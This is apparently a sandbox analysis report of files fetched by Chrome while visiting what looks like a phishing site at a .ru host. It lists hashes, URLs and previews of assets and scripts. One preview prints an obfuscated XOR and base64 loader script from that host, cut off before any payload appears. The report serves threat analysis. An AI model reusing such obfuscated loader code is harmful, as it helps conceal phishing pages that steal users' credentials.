                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1414), with no line terminators
                                                Category:downloaded
                                                Size (bytes):1414
                                                Entropy (8bit):5.772469714825551
                                                Encrypted:false
                                                SSDEEP:24:2jkm94/zKPccAv+KVC4TLv138EgFB5vtTGJrdcl/1t4glvllLtmjv1ASa0WsLqoa:VKEctKomR3evtTA2tX7M1SiLrwUnG
                                                MD5:58A5AE821E6FCB54BCDF828EE804E098
                                                SHA1:F1CBB73A72F7C4A2306D98E61A82A334CCC2A47D
                                                SHA-256:CBA9CB9557A1F779ED0DD0911CB3BDBF141C348DE448ABBD2C9D835AF0E114D5
                                                SHA-512:3B1B600C911E1D1485D31A55980CD75AC74C75CB6D33F0AE5DBCD0C7F820AE4F65AC8611D45612CE0B61EFBD9B602904AD26F2B348D16E0C13F13F6BF89281CC
                                                Malicious:false
                                                Reputation:low
                                                URL:https://www.google.com/recaptcha/api.js
                                                Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.pr
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):7390
                                                Entropy (8bit):4.02755241095864
                                                Encrypted:false
                                                SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                Malicious:false
                                                Reputation:low
                                                Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 98 x 97, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):4.068159130770307
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPlNaHhLyxl/k4E08up:6v/lhPCc7Tp
                                                MD5:410690AE7653629B889ABE1087D44CC2
                                                SHA1:D6C46B441F5C4FE79B6AAE2AC20575C38AA3D4FA
                                                SHA-256:67B98872EC2EB09FC90C66CCB57337A903DE14A17A0190AB493CF8285A2F22B8
                                                SHA-512:81D613F24EB35CFCFC725FD4FFF619AC42DD607F474F1EDD711F1C00F4DDF58865054AECEFCD396DD650A08FF0E6EFA59AEE450486AD07DCD3411FCA1571ADCD
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR...b...a......S......IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 98 x 97, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):61
                                                Entropy (8bit):4.068159130770307
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPlNaHhLyxl/k4E08up:6v/lhPCc7Tp
                                                MD5:410690AE7653629B889ABE1087D44CC2
                                                SHA1:D6C46B441F5C4FE79B6AAE2AC20575C38AA3D4FA
                                                SHA-256:67B98872EC2EB09FC90C66CCB57337A903DE14A17A0190AB493CF8285A2F22B8
                                                SHA-512:81D613F24EB35CFCFC725FD4FFF619AC42DD607F474F1EDD711F1C00F4DDF58865054AECEFCD396DD650A08FF0E6EFA59AEE450486AD07DCD3411FCA1571ADCD
                                                Malicious:false
                                                Reputation:low
                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiq
                                                Preview:.PNG........IHDR...b...a......S......IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):1400
                                                Entropy (8bit):7.808470583085035
                                                Encrypted:false
                                                SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                MD5:333EE830E5AB72C41DD9126A27B4D878
                                                SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230
                                                Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):727
                                                Entropy (8bit):7.573165690842521
                                                Encrypted:false
                                                SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139
                                                Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:low
                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):268
                                                Entropy (8bit):5.111190711619041
                                                Encrypted:false
                                                SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                MD5:59759B80E24A89C8CD029B14700E646D
                                                SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                Malicious:false
                                                Reputation:low
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):49602
                                                Entropy (8bit):7.881935507115631
                                                Encrypted:false
                                                SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                MD5:DB783743CD246FF4D77F4A3694285989
                                                SHA1:B9466716904457641B7831868B47162D8D378D41
                                                SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):1812
                                                Entropy (8bit):6.05536256138819
                                                Encrypted:false
                                                SSDEEP:48:7IkALVuPiTzWG93jIgfFY6MA07wiI+1dFuw1uSE2yV/35:bS3LjttaXIQUouSJc
                                                MD5:BD342A61CD1E76D13E1DC622E44A43E6
                                                SHA1:017ECB468A875D94C46CE6F0F610C9A587539345
                                                SHA-256:55C78DA32E87658BA00CC26C74AFD2E772FEB129DE2675BDB42A2F03941B24E0
                                                SHA-512:D0CEB951782CE238727E762EC23F279729FE58640E44753FDD1CD03040AD329A0E02F6B4D65D56719EE4C788B6C4E23148E1EFD3439CC373B5B68F85210ACB96
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/hIzc6w/
                                                Preview:<script>..function xlxciYQxxY(QqqoYDkYWR, qFydKXvzNC) {..let ojQkfZEMFA = '';..QqqoYDkYWR = atob(QqqoYDkYWR);..let CIyzBTyHVT = qFydKXvzNC.length;..for (let i = 0; i < QqqoYDkYWR.length; i++) {.. ojQkfZEMFA += String.fromCharCode(QqqoYDkYWR.charCodeAt(i) ^ qFydKXvzNC.charCodeAt(i % CIyzBTyHVT));..}..return ojQkfZEMFA;..}..var mMkRRRzxKM = xlxciYQxxY(`aAsEHy8+MmlHWiIZFU0qADIhAQAGLywaZnNmICM+MBcQQyohJTY+OTsWSQUnPS55OSU2CxMfbn9vbEdaMg0JDjInKTlqFCUNAyY3JAkHO3gnMC01EwwhNj0/fVgcYExuZndqJCYBRxZLRGZ3anB0WEdNNCsyIjg+dBoTAidmJyMlMnwLLyceGwQwKyc7UU5Ne3NmJAIaDC0lCic5KWxHWnRYR007biU2PjM8WE8INDxvdzFdXlhHTWZuZndqIjEMEh8obiA2JiMxQ2pnZm5mdzddXgVqZy8objsEJCIzNz8RBTF3d210WkVEPUNMd2pwdA8OAyIhMXkmPzcZEwQpIGg/ODUyWFpNMScoMyUnehQIDic6LzgkfiQZEwUoLysyant0WlhPZmVmdRhyb3VtEEtELzFiPBoMESYWHBEcPXB1RVpNZGxvLEdadFhHTS8oZn8OISEcLBwsARYmYjwaDBEmFhwRHD15fVgcYExuZndqJjUKRxcrPQklKxM5LSRNe24nIyUyfBQpGTAFFgUdGyNRXGBMbmZ3aiY1CkcoHiItFCM2OCEjTXtubi0nIxsKBi4rGwV5JzEgGw9FaWYdCz1+eSVMLR0vay0LfQ5ISlRoYxt8Fn4PGUoXB2McZ2dpCQNV
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):29796
                                                Entropy (8bit):7.980058333789969
                                                Encrypted:false
                                                SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                MD5:210433A8774859368F3A7B86D125A2A7
                                                SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235
                                                Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):1864
                                                Entropy (8bit):5.222032823730197
                                                Encrypted:false
                                                SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                MD5:BC3D32A696895F78C19DF6C717586A5D
                                                SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220
                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):231
                                                Entropy (8bit):6.725074433303473
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                MD5:547988BAC5584B4608466D761E16F370
                                                SHA1:C11BB71049702528402A31027F200184910A7E23
                                                SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):76
                                                Entropy (8bit):4.631455882779888
                                                Encrypted:false
                                                SSDEEP:3:xPW1skF0NuiQMnumOPIOAyP2MR:xPWmJumOPzAo2C
                                                MD5:55D6D0CAE462E2BC690BC8AF45985B15
                                                SHA1:0AD644096680FB01BFD9AF1CFE5F6E68911EA01F
                                                SHA-256:2E5AE61757DB10E0E3770407B68ADE329068C840070A02F119C9EBE296194043
                                                SHA-512:A929EE066B9150F1DC864A38FC1BF7D1F69B560CF6C123C0709EC983581B0B5F37360B3F318CA78EC9A3755C592A2928FA882CB34F160381ADA5A148B0786BCA
                                                Malicious:false
                                                Reputation:low
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwn-eYnVTO51jxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                                Preview:CjYKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):70712
                                                Entropy (8bit):6.94130504124589
                                                Encrypted:false
                                                SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                MD5:F70FF06D19498D80B130EC78176FD3FF
                                                SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                Malicious:false
                                                Reputation:low
                                                URL:https://f8gxf.oritelos.ru/uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260
                                                Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (42526)
                                                Category:downloaded
                                                Size (bytes):42527
                                                Entropy (8bit):5.373234803143812
                                                Encrypted:false
                                                SSDEEP:768:NCoLEBOnQowmmxCsbE95NdDid29P4DY88fvO959F1DQ+aohLyKoS4Hnla5KX5:qWQowHxCsQ919P0959vk
                                                MD5:C667700BE084108F8DEDED9026FFBBF9
                                                SHA1:31D633A11EF13A66787EC6504E38C11842664B7B
                                                SHA-256:E158035A6F740B0245A027BF0D559C56782EBBEEC7CAB5A827083BD16AA47901
                                                SHA-512:9EEA0C81A4D7E7ED7EE7F30A53B5AA93C356129D9850AE978A6D408F0B1337F3E9FCEDE25C996DCA3A2AC9840B86B4D821CD0A9DFFCF8BC427A730F420F33891
                                                Malicious:false
                                                Reputation:low
                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js
                                                Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function dr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (45667)
                                                Category:downloaded
                                                Size (bytes):45806
                                                Entropy (8bit):5.207605835316031
                                                Encrypted:false
                                                SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                Malicious:false
                                                Reputation:low
                                                URL:https://cdn.socket.io/4.6.0/socket.io.min.js
